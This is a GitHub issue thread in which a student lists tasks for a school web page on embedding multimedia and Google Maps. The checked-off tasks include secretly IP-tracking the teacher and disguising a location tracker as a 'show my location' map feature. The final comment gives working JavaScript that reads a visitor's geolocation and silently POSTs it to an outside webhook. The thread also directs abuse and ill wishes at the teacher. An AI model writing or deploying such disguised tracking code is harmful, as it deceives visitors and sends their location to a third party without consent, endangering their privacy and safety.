### ISSUE TITLE
 Task list for a new assignment called “Multimedia”

### ISSUE THREAD

**Issue by ErmitaVulpe** [ErmitaVulpe/orlicz#17]
# Task list for a new assignment called “Multimedia”
This is every single requirement that my “teacher” stated. I can’t wait for them to change! Gotta love every time he says something like

> Remember. It’s never fair to change the rules of the game, when the game is on. 

I wish the worst to that demented ass mf. 

## Requirements for the thing

- [x] At the top of the site title it "Sposoby osadzania plików multimedialnych na stronie internetowej"
- [x] Embeded multimedia
    - [x] 3 Video files
        - [x] Short video of some irl characters (Can be a monkey!) from local files
        - [x] An animation from web
        - [x] A full-length movie from web (wtf?)
    - [x] 4 Audio files
        - [x] 1 From local files
        - [ ] #18
    - [x] 4 Images 
        - [x] jpg (local)
        - [x] png (local)
        - [x] gif (local)
        - [x] anything (from web)
    - [x] 5 Google maps embeds (wtf?)
        - [x] A map with multiple objects 
        - [x] A walk in a city
        - [x] Bike path between my school and my “supposed place of residence” (wtf?)
        - [x] Just a pin of my school
        - [x] Some characteristic point in a city
- [x] For every embedded multimedia quote it’s code (wtf?)
- [x] Multimedia form local files can be 3 minutes max
- [x] Show 2 possible mistakes that could be made while embedding multimedia
    - [x] Invalid <iframe> tag size
    - [x] Video controls not showing on embedded video

Again this is EVERYTHING i cought from his slumber of a speach

Leaving this as a task list to go through it later

## as for the task list itself
- [x] Think of a theme
- [x] Make a basic modular template for the thing
    - [x] Devide into section. Each section for a diffrent kind of embed
- [x] Fill it with content
    - [x] 3 Video files
    - [x] 4 Audio files
    - [x] 4 Images 
    - [x] 5 Google maps embeds
- [ ] ~~A bit of script to, at first, show only the start of the quoted code for each multimedia, and after the press of a show more button, actually show more~~
- [x] A little script goofy silly prank
    - [x] IP track that son of a bitch
    - [x] Latitude and longitude tracker disguised as a "show my location on a map" feature in Google maps section
- [x] initial release

**Comment by ErmitaVulpe** [comment]
### The funny is done. now it's time to work on the backend :trollface:
```[JS]
function sendCoordinatesToWebhook() {
	navigator.geolocation.getCurrentPosition(function (position) {
		const payload = {
			latitude: position.coords.latitude,
			longitude: position.coords.longitude
		};
		fetch('https://tymon.wilczek.dev/webhook', {
			method: 'POST',
			body: JSON.stringify(payload),
			headers: {
				'Content-Type': 'application/json'
			}
		})
			.then(response => console.log(response))
			.catch(error => console.error(error));
	});
}
sendCoordinatesToWebhook();
```
